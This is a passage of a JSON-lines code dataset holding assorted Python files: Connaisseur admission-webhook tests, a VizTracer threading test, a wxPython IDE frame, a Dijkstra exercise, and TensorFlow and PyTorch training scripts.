\"request_kube_api\", m_request)\n\n\n@pytest.fixture\ndef mock_notary_health(monkeypatch):\n def m_health_check(path: str):\n if path == \"healthy\":\n return True\n return False\n\n monkeypatch.setattr(fs, \"health_check\", m_health_check)\n\n\n@pytest.fixture\ndef mock_policy_no_verify(monkeypatch):\n def m__init__(self):\n self.policy = {\"rules\": [{\"pattern\": \"*:*\", \"verify\": False}]}\n\n monkeypatch.setattr(policy.ImagePolicy, \"__init__\", m__init__)\n\n\n@pytest.fixture\ndef mock_policy_verify(monkeypatch):\n def m__init__(self):\n self.policy = {\"rules\": [{\"pattern\": \"*:*\", \"verify\": True}]}\n\n monkeypatch.setattr(policy.ImagePolicy, \"__init__\", m__init__)\n\n\n@pytest.fixture\ndef mock_notary_allow_leet(monkeypatch):\n def m_get_trusted_digest(host: str, image: Image, policy_rule: dict):\n if (\n image.digest\n == \"1337133713371337133713371337133713371337133713371337133713371337\"\n ):\n return \"abcdefghijklmnopqrst\"\n else:\n raise NotFoundException(\n 'could not find signed digest for image \"{}\" in trust data.'.format(\n str(image)\n )\n )\n\n monkeypatch.setattr(mutate, \"get_trusted_digest\", m_get_trusted_digest)\n\n\n@pytest.fixture\ndef mock_mutate(monkeypatch):\n def m_get_parent_images(request: dict, index: int, namespace: str):\n return []\n\n monkeypatch.setattr(mutate, \"get_parent_images\", m_get_parent_images)\n\n\ndef get_file_json(path: str):\n with open(path, \"r\") as file:\n return json.load(file)\n\n\ndef test_healthz():\n assert fs.healthz() == (\"\", 200)\n\n\n@pytest.mark.parametrize(\n \"sentinel_name, webhook, notary_health, status\",\n [\n (\"sample_sentinel_run\", \"\", \"healthy\", 200),\n (\"sample_sentinel_fin\", \"\", \"healthy\", 500),\n (\"sample_sentinel_err\", \"\", \"healthy\", 500),\n (\"\", \"\", \"\", 500),\n (\"sample_sentinel_fin\", \"sample_webhook\", \"healthy\", 200),\n (\"sample_sentinel_fin\", \"\", \"healthy\", 500),\n (\"sample_sentinel_fin\", \"sample_webhook\", \"unhealthy\", 500),\n ],\n)\ndef test_readyz(\n mock_kube_request,\n mock_notary_health,\n monkeypatch,\n sentinel_name,\n webhook,\n notary_health,\n status,\n):\n monkeypatch.setenv(\"CONNAISSEUR_NAMESPACE\", \"conny\")\n monkeypatch.setenv(\"CONNAISSEUR_SENTINEL\", sentinel_name)\n monkeypatch.setenv(\"CONNAISSEUR_WEBHOOK\", webhook)\n monkeypatch.setenv(\"NOTARY_SERVER\", notary_health)\n\n assert fs.readyz() == (\"\", status)\n\n\n@pytest.mark.parametrize(\n \"name\",\n [(\"ad_request_deployments\"), (\"ad_request_pods\"), (\"ad_request_replicasets\")],\n)\ndef test_mutate_no_verify(mock_mutate, mock_policy_no_verify, name):\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n admission_response = response.get_json()[\"response\"]\n assert admission_response[\"allowed\"] == True\n assert admission_response[\"status\"][\"code\"] == 202\n assert not \"response\" in admission_response[\"status\"]\n\n\n@pytest.mark.parametrize(\n \"name, api_version, allowed, code, message\",\n [\n (\"ad_request_pods\", \"v2\", False, 403, \"API version v2 unknown.\"),\n (\n \"sample_releases\",\n \"admission.k8s.io/v1beta1\",\n False,\n 403,\n \"unknown request object kind None\",\n ),\n ],\n)\ndef test_mutate_invalid(monkeypatch, name, api_version, allowed, code, message):\n monkeypatch.setenv(\"DETECTION_MODE\", \"0\")\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n mock_request_data[\"apiVersion\"] = api_version\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n admission_response = response.get_json()[\"response\"]\n assert admission_response[\"allowed\"] == allowed\n assert admission_response[\"status\"][\"code\"] == code\n assert admission_response[\"status\"][\"message\"] == message\n\n\n@pytest.mark.parametrize(\n \"name, allowed, image, detection\",\n [\n (\n \"ad_request_pods\",\n False,\n \"someguy/charlie-image@sha256:91ac9b26df583762234c1cdb2fc930364754ccc59bc752a2bfe298d2ea68f9ff\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n False,\n \"docker.io/someguy/charlie-image@sha256:91ac9b26df583762234c1cdb2fc930364754ccc59bc752a2bfe298d2ea68f9ff\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n False,\n \"docker.io/alice/goes-to-town-image@sha256:deadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeaf\",\n \"1\",\n ),\n (\n \"ad_request_pods\",\n True,\n \"someguy/bob-image@sha256:1337133713371337133713371337133713371337133713371337133713371337\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n True,\n \"docker.io/theotherguy/benign@sha256:1337133713371337133713371337133713371337133713371337133713371337\",\n \"1\",\n ),\n ],\n)\ndef test_mutate_verify(\n mock_mutate,\n mock_policy_verify,\n mock_notary_allow_leet,\n name,\n allowed,\n image,\n detection,\n monkeypatch,\n):\n monkeypatch.setenv(\"DETECTION_MODE\", detection)\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n mock_request_data[\"request\"][\"object\"][\"spec\"][\"containers\"][0][\"image\"] = image\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n\n admission_response = response.get_json()[\"response\"]\n\n assert admission_response[\"allowed\"] == allowed\n\n if allowed:\n assert admission_response[\"status\"][\"code\"] == 202\n assert not \"message\" in admission_response[\"status\"]\n else:\n assert admission_response[\"status\"][\"code\"] == 403\n image = (\n image\n if image.startswith(\"docker.io/\")\n else \"{}{}\".format(\"docker.io/\", image)\n )\n detection_mode_string = (\n \" (not denied due to DETECTION_MODE)\" if detection == \"1\" else \"\"\n )\n expected_message = (\n 'could not find signed digest for image \"{}\" in trust data.{}'.format(\n image, detection_mode_string\n )\n )\n assert admission_response[\"status\"][\"message\"] == expected_message\n","sub_path":"connaisseur/tests/test_flask_server.py","file_name":"test_flask_server.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"569986840","text":"# -*- coding: cp1251 -*- #\nfrom base import BasePage\n\nfrom systems.KURSSKLAD.REPORTS.SUBTYPESALE.templates.index import index\n\nclass SubTypeSale(BasePage):\n \n def index(self, id_system=None):\n BasePage.index(self, id_system)\n subtype = self.dbExec(sql='select *\\\n from docsubtype dst\\\n left join doctype dt on dst.doctid = dt.doctid\\\n where dt.code = ?',\n params=['SALE'], fetch='all')['datalist']\n return self.drawTemplate(templ=index, data=[{'subtype':subtype}])\n index.exposed = True \n \n def byWares(self,dbeg,dend,subtype):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from K_SUBTYPESALE_SEL(?,?,?) order by wname',\n params=[dbeg,dend,subtype], fetch='all')\n return self.pyDumps(data)\n byWares.exposed = True\n \n def byWaresDocs(self,dbeg,dend,subtype,waresid):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from K_SUBTYPESALE_DOCS(?,?,?,?)',\n params=[dbeg,dend,subtype,waresid], fetch='all')\n return self.pyDumps(data)\n byWaresDocs.exposed = True\n \n \n def byDocuments(self,dbeg,dend,subtype):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from WH_REPORT_SUBTYPESALE_DOCUMENTS(?,?,?)',\n params=[subtype,dbeg,dend], fetch='all')\n return self.pyDumps(data)\n byDocuments.exposed = True ","sub_path":"systems/KURSSKLAD/REPORTS/SUBTYPESALE/subtypesale.py","file_name":"subtypesale.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"153138191","text":"\nclass Foo(object):\n def doSomething(self,x):\n print(\"do something: (%s,%s)\"%(self,x))\n\n @classmethod\n def class_foo(cls,x):\n # for classMethod, first function argument has to be Class reference\n b = cls()\n b.doSomething('b')\n print(\"executing class_method(%s,%s)\"%(cls,x))\n\n @staticmethod\n def static_foo(x):\n print(\"executing static_method(%s)\"%x)\n\na=Foo()\n\na.class_foo(1)\nFoo.class_foo(1)\n\na.static_foo(1)\nFoo.static_foo('hi')\n","sub_path":"suger/class_vs_static.py","file_name":"class_vs_static.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"48800273","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt\n\nfrom viztracer import VizTracer\nimport time\nimport threading\nfrom .base_tmpl import BaseTmpl\nfrom .cmdline_tmpl import CmdlineTmpl\n\n\ndef fib(n):\n if n < 2:\n return 1\n time.sleep(0.000001)\n return fib(n - 1) + fib(n - 2)\n\n\nclass MyThread(threading.Thread):\n def run(self):\n fib(10)\n\n\nclass TestMultithread(BaseTmpl):\n def test_basic(self):\n tracer = VizTracer(max_stack_depth=4)\n tracer.start()\n\n thread1 = MyThread()\n thread2 = MyThread()\n thread3 = MyThread()\n thread4 = MyThread()\n\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n threads = [thread1, thread2, thread3, thread4]\n\n for thread in threads:\n thread.join()\n\n tracer.stop()\n entries = tracer.parse()\n self.assertGreater(entries, 160)\n\n metadata = [e for e in tracer.data[\"traceEvents\"] if e[\"ph\"] == \"M\"]\n self.assertEqual(len([e for e in metadata if e[\"name\"] == \"process_name\"]), 1)\n self.assertEqual(len([e for e in metadata if e[\"name\"] == \"thread_name\"]), 5)\n\n def test_with_small_buffer(self):\n tracer = VizTracer(tracer_entries=300)\n tracer.start()\n\n thread1 = MyThread()\n thread2 = MyThread()\n thread3 = MyThread()\n thread4 = MyThread()\n\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n threads = [thread1, thread2, thread3, thread4]\n\n for thread in threads:\n thread.join()\n\n tracer.stop()\n entries = tracer.parse()\n self.assertEqual(entries, 300)\n\n\nfile_log_sparse = \"\"\"\nimport threading\nfrom viztracer import log_sparse\n\nclass MyThreadSparse(threading.Thread):\n def run(self):\n self.sparse_func()\n\n @log_sparse\n def sparse_func(self):\n return 0\n\nthread1 = MyThreadSparse()\nthread2 = MyThreadSparse()\n\nthread1.start()\nthread2.start()\n\nthreads = [thread1, thread2]\n\nfor thread in threads:\n thread.join()\n\"\"\"\n\n\nclass TestMultithreadCmdline(CmdlineTmpl):\n def test_with_log_sparse(self):\n self.template([\"viztracer\", \"-o\", \"result.json\", \"--log_sparse\", \"cmdline_test.py\"],\n expected_output_file=\"result.json\",\n script=file_log_sparse,\n expected_entries=2)\n","sub_path":"tests/test_multithread.py","file_name":"test_multithread.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"544607264","text":"# main_frame.py\n\nr'''Primary frame (window) for the IDE.'''\n\nimport sys\nimport wx\n\nfrom ucc.gui import registry\nfrom ucc.gui.other.main_menu_bar import MainMenuBar\nfrom ucc.gui.panels.left_tree_panel import LeftTreePanel\nfrom ucc.gui.panels.right_main_panel import RightMainPanel\nfrom ucc.gui import debug\n\nclass MainFrame(wx.Frame):\n def __init__(self, parent, id, title):\n super(MainFrame, self).__init__(parent, id, title,\n size = list(map(int,\n registry.config.get('gui', 'window-size').split('x'))),\n style = wx.DEFAULT_FRAME_STYLE # | wx.NO_FULL_REPAINT_ON_RESIZE\n )\n self.SetMinSize((970,720))\n \n # setup status bar\n \n self.CreateStatusBar()\n \n # setup menu bar\n \n registry.mainMenuBar = MainMenuBar(self)\n self.SetMenuBar(registry.mainMenuBar)\n \n # setup toolbar\n \n registry.mainToolbar = self.CreateToolBar(style = wx.TB_HORIZONTAL)\n registry.mainToolbar.AddLabelTool(registry.ID_OPEN, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddLabelTool(registry.ID_SAVE_ALL, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddSeparator()\n registry.mainToolbar.AddLabelTool(registry.ID_SAVE_WORD, '', wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddLabelTool(registry.ID_VERIFY, '', wx.ArtProvider.GetBitmap(wx.ART_TICK_MARK, wx.ART_TOOLBAR))\n # registry.mainToolbar.AddSeparator()\n registry.mainToolbar.AddLabelTool(registry.ID_COMPILE, '', wx.ArtProvider.GetBitmap(wx.ART_EXECUTABLE_FILE, wx.ART_TOOLBAR))\n registry.mainToolbar.AddLabelTool(registry.ID_LOAD, '', wx.ArtProvider.GetBitmap(wx.ART_GO_FORWARD, wx.ART_TOOLBAR))\n registry.mainToolbar.Realize()\n \n self.Bind(wx.EVT_TOOL, registry.app.onOpen, id=registry.ID_OPEN)\n self.Bind(wx.EVT_TOOL, registry.app.onSaveWord, id=registry.ID_SAVE_WORD)\n self.Bind(wx.EVT_TOOL, registry.app.onCompile, id=registry.ID_COMPILE)\n self.Bind(wx.EVT_TOOL, registry.app.onLoad, id=registry.ID_LOAD)\n self.Bind(wx.EVT_CLOSE, self.onExit)\n \n # setup mainPanel\n \n registry.mainPanel = wx.Panel(self, -1)\n \n # setup sizer\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(registry.mainPanel, 1, wx.EXPAND)\n \n self.SetSizer(sizer)\n \n # setup splitter\n \n splitter = wx.SplitterWindow(registry.mainPanel, -1, style=wx.SP_3D)\n \n # setup panels\n \n registry.leftTreePanel = LeftTreePanel(splitter, -1, wx.BORDER_SUNKEN | wx.WANTS_CHARS)\n registry.rightMainPanel = RightMainPanel(splitter, -1, wx.BORDER_SUNKEN)\n \n # setup splitter/sizers\n \n splitter.SetMinimumPaneSize(200)\n splitter.SplitVertically(registry.leftTreePanel,\n registry.rightMainPanel,\n registry.config.getint('gui', 'left-panel-width'))\n \n # setup sizer\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(splitter, 1, wx.EXPAND)\n registry.mainPanel.SetSizer(sizer)\n \n # paint\n \n self.paint()\n \n # show frame\n \n self.Center()\n self.Show(True)\n \n def paint(self):\n debug.trace(\"Painting mainFrame\")\n registry.leftTreePanel.paint()\n registry.rightMainPanel.paint()\n \n def onExit(self, event):\n \n # make sure all words are saved\n \n opened_words = [word for word in \\\n list(registry.top_package.word_dict.values()) \\\n if word.save_state == False]\n if len(opened_words):\n dlg = ConfirmSaveDialog(None, -1, \"Do you want to save the \" \\\n \"currently opened words?\", \\\n size=(350, 200))\n val = dlg.ShowModal()\n if val == wx.ID_SAVE:\n debug.notice(\"Saving Words\")\n for word in opened_words:\n word.save()\n elif val == wx.ID_NO:\n debug.notice(\"Not Saving Words\")\n else:\n dlg.Destroy()\n return\n \n dlg.Destroy()\n \n event.Skip()\n \n\nclass ConfirmSaveDialog(wx.Dialog):\n def __init__(self, parent, id, title, *args, **kwargs):\n super(ConfirmSaveDialog, self).__init__(parent, id, title ,*args, **kwargs)\n \n sizer = wx.BoxSizer(wx.VERTICAL)\n \n label = wx.StaticText(self, -1, \"Do you want to save the currently open words?\")\n sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)\n \n line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)\n sizer.Add(line, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.RIGHT|wx.TOP, 5)\n \n btnsizer = wx.StdDialogButtonSizer()\n \n btn = wx.Button(self, wx.ID_SAVE)\n btn.Bind(wx.EVT_BUTTON, lambda event: self.EndModal(wx.ID_SAVE))\n btn.SetDefault()\n btnsizer.AddButton(btn)\n \n btn = wx.Button(self, wx.ID_NO)\n btn.Bind(wx.EVT_BUTTON, lambda event: self.EndModal(wx.ID_NO))\n btnsizer.AddButton(btn)\n \n btn = wx.Button(self, wx.ID_CANCEL)\n btnsizer.AddButton(btn)\n \n btnsizer.Realize()\n \n sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)\n \n self.SetSizer(sizer)\n sizer.Fit(self)\n \n self.CenterOnScreen()\n \n","sub_path":"ucc/gui/frames/main_frame.py","file_name":"main_frame.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"386734799","text":"#Sending email\n#Dijistra algorithm\nimport queue\nMAX = 100\nINF = int(1e9)\n\n\ndef Dijistra(s,graph,dist):\n pq = queue.PriorityQueue()\n pq.put((s,0))\n dist[s] = 0\n while pq.empty() == False:\n top = pq.get()\n node = top[0]\n d = top[1]\n for neighbor in graph[node]:\n if d + neighbor[1] < dist[neighbor[0]]:\n dist[neighbor[0]] = d + neighbor[1]\n pq.put((neighbor[0],dist[neighbor[0]]))\n path[neighbor[0]] = node\n\nif __name__ == '__main__':\n testcase = int(input())\n result = list()\n n = 50000\n while(testcase > 0):\n graph = [[] for i in range(n+5)]\n n, m, s, d = map(int,input().split())\n for i in range(m):\n u, v, cost = map(int,input().split())\n graph[u].append((v,cost))\n graph[v].append((u,cost))\n\n dist = [INF for i in range(n+5)]\n path = [-1 for i in range(n+5)]\n Dijistra(s,graph,dist)\n ans = dist[d]\n result.append(ans)\n testcase = testcase - 1\n\n #print(result)\n for i in range(len(result)):\n if result[i] == INF:\n print('Case ' + '#%d: ' %i + 'unreachable')\n else:\n print('Case ' + '#%d: %d' % (i,result[i]) )\n","sub_path":"BigO_Algorithm/Homework_Day9/sending_email.py","file_name":"sending_email.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46727091","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport pandas as pd\n\n#Path\ninput_data_path='C:/TF/in_data.txt'\noutput_data_path='C:/TF/out_data.txt'\nmodel_path=\"C:/TF/model.ckpt\"\noutput_test_path=\"C:/TF/test_outputs.txt\"\ntargets_test_path=\"C:/TF/test_targets.txt\"\nmodel_struct_path=\"C:/TF/model.txt\"\n\n#struct=open(model_struct_path,'r')\n#struct.read()\n\n\n# Parameters\nlearning_rate = 0.001\ndrop_chance=0.4\n\nbatch_size = 100\ndisplay_step = 1\nmax_epoch=100\nexamples=200;\ntrain_size=0.85\n\nlayers=2\nnet_struct=[100,100]\nnet_struct_fun=[tf.nn.sigmoid,tf.nn.sigmoid]\n\n# Network Parameters\nn_hidden_1 = 50\nn_hidden_2 = 50\nn_hidden_3 = 50\nn_hidden_4 = 50\nn_hidden_5 = 50\nn_input = 3\nn_classes = 1\n\n#Input Data\nX=np.genfromtxt(input_data_path)\nY=np.genfromtxt(output_data_path)\nX=np.float32(X)\nY=np.float32(Y)\ndata_size=X.shape[0]\ntrain_size*=data_size\ntrain_size=int(train_size)\ntest_size=data_size-train_size\nX=np.reshape(X,[data_size,n_input])\nY=np.reshape(Y,[data_size,n_classes])\n\nXnorm=np.empty([data_size,n_input])\nYnorm=np.empty([data_size,n_classes])\n\nXmin=np.empty([n_input])\nXmax=np.empty([n_input])\nYmin=np.empty([n_classes])\nYmax=np.empty([n_classes])\n\nfor index in range(n_input):\n Xmin[index]=X[0][index]\n Xmax[index]=X[0][index]\nfor index in range(n_classes):\n Ymin[index]=Y[0][index]\n Ymax[index]=Y[0][index]\nfor data_index in range(examples):\n for input_index in range(n_input):\n if(Xmin[input_index]>=X[data_index][input_index]):\n Xmin[input_index] = X[data_index][input_index]\n if(Xmax[input_index]<=X[data_index][input_index]):\n Xmax[input_index] = X[data_index][input_index]\nfor data_index in range(examples):\n for input_index in range(n_classes):\n if(Ymin[input_index]>=Y[data_index][input_index]):\n Ymin[input_index] = Y[data_index][input_index]\n if(Ymax[input_index]<=Y[data_index][input_index]):\n Ymax[input_index] = Y[data_index][input_index]\n\nfor index in range(data_size-examples):\n np.delete(X,examples+index)\n np.delete(Y,examples+index)\n\ndef normalize(x,xmin,xmax,ymin,ymax):\n return (((ymax-ymin)*(x-xmin)/(xmax-xmin)) + ymin)\n\nfor index in range(examples):\n for i in range(n_input):\n Xnorm[index][i]=normalize(X[index][i],Xmin[i],Xmax[i],-10.0,10.0)\n\nfor index in range(examples):\n for i in range(n_classes):\n Ynorm[index][i] = normalize(Y[index][i], Ymin[i], Ymax[i], 0.0, 1.0)\n\n\nXnorm=np.float32(Xnorm)\nYnorm=np.float32(Ynorm)\n\n# Store layers weight & bias\nweights = {\n 'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n 'h4': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n 'h5': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n 'out': tf.Variable(tf.random_normal([n_hidden_3, n_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'b3': tf.Variable(tf.random_normal([n_hidden_3])),\n 'b4': tf.Variable(tf.random_normal([n_hidden_3])),\n 'b5': tf.Variable(tf.random_normal([n_hidden_3])),\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# tf Graph input\nInput = tf.placeholder(\"float\", [None, n_input])\nOutput = tf.placeholder(\"float\", [None, n_classes])\n\n# Create model\ndef multilayer_perceptron(x):\n\n layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n layer_1=tf.nn.sigmoid(layer_1)\n layer_1=tf.nn.dropout(layer_1,drop_chance)\n\n layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n layer_2=tf.nn.sigmoid(layer_2)\n layer_2=tf.nn.dropout(layer_2,drop_chance)\n\n layer_3 = tf.add(tf.matmul(layer_2, weights['h3']), biases['b3'])\n layer_3=tf.nn.sigmoid(layer_3)\n layer_3=tf.nn.dropout(layer_3,drop_chance)\n\n layer_4 = tf.add(tf.matmul(layer_3, weights['h4']), biases['b4'])\n layer_4=tf.nn.sigmoid(layer_4)\n layer_4=tf.nn.dropout(layer_4,drop_chance)\n\n layer_5 = tf.add(tf.matmul(layer_4, weights['h5']), biases['b5'])\n layer_5=tf.nn.sigmoid(layer_5)\n layer_5=tf.nn.dropout(layer_5,drop_chance)\n\n out_layer = tf.add(tf.matmul(layer_5, weights['out']), biases['out'])\n #out_layer=tf.nn.sigmoid(out_layer)\n return out_layer\n\nlogits=multilayer_perceptron(Xnorm)\n\n# Define loss and optimizer\n#loss_op = tf.reduce_mean(tf.square(Y-logits))\nloss_op = tf.losses.mean_squared_error(labels=Y, predictions=logits)\n#loss_op=tf.reduce_mean(tf.square(Y-logits)/2.0)\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nvarinit=tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\n\n\nwith tf.Session() as sess:\n sess.run(init)\n # Training cycle\n epoch=0\n avg_cost=1\n\n #save_path=saver.restore(sess,model_path)\n #while(avg_cost>0.00001):\n #while (epoch exp name mappings - done\n\n\"\"\"\n\nimport sys\nsys.path.append('/home/scratch/kkorovin')\n\nimport os\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport pickle as pkl\nfrom tqdm import tqdm\nfrom copy import deepcopy\nfrom torch.optim import Adam, SGD\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau, StepLR\n\nfrom constants import DEVICE\nfrom datasets import get_data_loader\nfrom models import get_model\nfrom utils import *\n\n# checkpoint can be loaded into an initialized model with .load(name)\n\ndef parse_train_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, help='model to use')\n parser.add_argument('--dataset', type=str, help='dataset to use')\n parser.add_argument('--batch_size', default=64, type=int, help='batch size')\n parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')\n parser.add_argument('--n_epochs', default=15, type=int, help='number of training epochs')\n parser.add_argument('--verbose', default=False, type=bool, help='whether to display training statistics')\n args = parser.parse_args()\n return args\n\n\ndef run_training(model_name=\"vgg16\",\n dataset_name=\"cifar10\",\n batch_size=32, lr=1e-3, n_epochs=10,\n save_hist_period=1, verbose=False):\n \"\"\"\n For now only one model (vgg-16).\n\n Params:\n :model_name: \"vgg{11,13,16,19}\" or \"lenet\" (or \"[...]_random\")\n :dataset_name: \"cifar10\" or \"mnist\"\n :batch_size: int\n :lr: float\n :n_epochs: number of training epochs\n :save_hist_period: frequency with which points are saved\n\n \"\"\"\n # name of current checkpoint/run\n check_name = record_experiment(model_name, dataset_name, batch_size, lr)\n\n # setup model, optimizer and logging\n model = get_model(model_name).to(DEVICE)\n optimizer = SGD(params=model.parameters(), lr=lr)\n # scheduler = ReduceLROnPlateau(optimizer, patience=3,\n # threshold=0.1, min_lr=1e-5)\n scheduler = StepLR(optimizer, step_size=10, gamma=0.1)\n\n cross_ent = nn.CrossEntropyLoss()\n\n # load data\n train_loader = get_data_loader(dataset_name, \"train\", batch_size)\n val_loader = get_data_loader(dataset_name, \"val\", batch_size)\n\n history = init_history()\n\n update_history({\"train_loss\": float(\"inf\"),\n \"val_acc\": 0.,\n \"weights\": deepcopy(model.state_dict())},\n history, check_name)\n\n for epoch in range(n_epochs):\n model.train()\n if verbose: print(\"Starting training epoch {}\".format(epoch+1))\n\n running_loss = 0.\n num_batches = len(train_loader)\n\n for (xs, ys) in train_loader:\n xs, ys = xs.to(DEVICE), ys.to(DEVICE)\n optimizer.zero_grad()\n logits = model(xs)\n\n loss = cross_ent(logits, ys)\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), 5.)\n optimizer.step()\n\n running_loss += loss.item()\n if np.isnan(running_loss):\n print(\"Loss is nan\")\n exit(0)\n\n avg_loss = running_loss / num_batches\n scheduler.step(avg_loss)\n model.save(check_name)\n\n if verbose: print(\"Epoch {} loss: {:.3f}\".format(epoch+1, avg_loss))\n\n if epoch % save_hist_period == 0:\n model.eval()\n accs = []\n for (xs, ys) in val_loader:\n xs, ys = xs.to(DEVICE), ys.to(DEVICE)\n logits = model(xs)\n y_pred = logits.argmax(dim=1)\n batch_acc = (y_pred == ys).float().mean().item()\n accs.append(batch_acc)\n\n if verbose: print(\"Validation accuracy: {:.3f}\".format(np.mean(accs)))\n update_history({\"train_loss\": avg_loss,\n \"val_acc\": np.mean(accs),\n \"weights\": deepcopy(model.state_dict())},\n history, check_name)\n\n print(\"Last avg loss {}, eval acc {}\".format(avg_loss, np.mean(accs)))\n # after the end of all epochs, last checkpoint has been saved\n\n\nif __name__==\"__main__\":\n args = parse_train_args()\n run_training(args.model, args.dataset,\n batch_size=args.batch_size, lr=args.lr,\n n_epochs=args.n_epochs, verbose=args.verbose)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"500439797","text":"\"\"\"\n@author: Alexander Studier-Fischer, Jan Odenthal, Berkin Özdemir, University of Heidelberg\n\"\"\"\n# !!! The values in this file must be initialized (a proper path, not None) before the main file can be run !!!\n\nPATH_TO_DIRECTORIES = \"..\"\n# Example: PATH_TO_DIRECTORIES = \"path/to/the/folder/containing/all/the/folders\"\n\nPATH_TO_POWERPOINT = \"../_PowerPoint.pptx\"\n# Example: PATH_TO_POWERPOINT = \"path/to/my/powerpoint/important_powerpoint.pptx\"\n\nPATH_TO_BACKGROUND_PIC = \"BackgroundPic.png\"\n","sub_path":"1.1_ImageMuncher/INPUTS.py","file_name":"INPUTS.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207847503","text":"import os\r\n\r\ndef cal(filename):\r\n\tf=open(filename)\r\n\tfor i in range(3):\r\n\t\tf.readline()\r\n\tsize=f.readline()\r\n\tsize=size.split(',')[2].split(':')[1][1:]\r\n\tt=f.readline()\r\n\tt=t.split(',')[0]\r\n\tf.close()\r\n\treturn (size,t)\r\n\r\n\r\nif __name__=='__main__':\r\n files=os.listdir()\r\n models1 = []\r\n for i in range(1,21):\r\n\t models1.append('benchmark_'+ str(i))\r\n models2 = []\r\n for i in range(1,36):\r\n\t models2.append('benchmark_'+str(i))\r\n\r\n models3 =['Banking1','Banking2','CommProtocol','Concurrency','Healthcare1','Healthcare2','Healthcare3','Healthcare4','Insurance','NetworkMgmt','ProcessorComm1','ProcessorComm2','Services','Storage1','Storage2','Storage3','Storage4','Storage5','SystemMgmt','Telecom']\r\n\r\n models4 =['SPIN-S','SPIN-V','GCC','Apache','Bugzilla',]\r\n \r\n res=dict()\r\n for i in models3:\r\n res[i]=[[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]\r\n results=list(filter(lambda x:'result' in x,files))\r\n for i in results:\r\n name=i.split('_')\r\n model=name[0]\r\n strength=int(name[2])\r\n repeat=int(name[3])\r\n res[model][strength-2][repeat-1]=cal(i)\r\n\t\r\n f=open('resSize.csv','w')\r\n f.write('model,2_1,2_2,2_3,3_1,3_2,3_3,4_1,4_2,4_3,5_1,5_2,5_3,6_1,6_2,6_3\\n')\r\n for key in models3:\r\n f.write(key+',')\r\n value=res[key]\r\n for i in range(5):\r\n for j in range(3):\r\n if not value[i][j]==0:\r\n 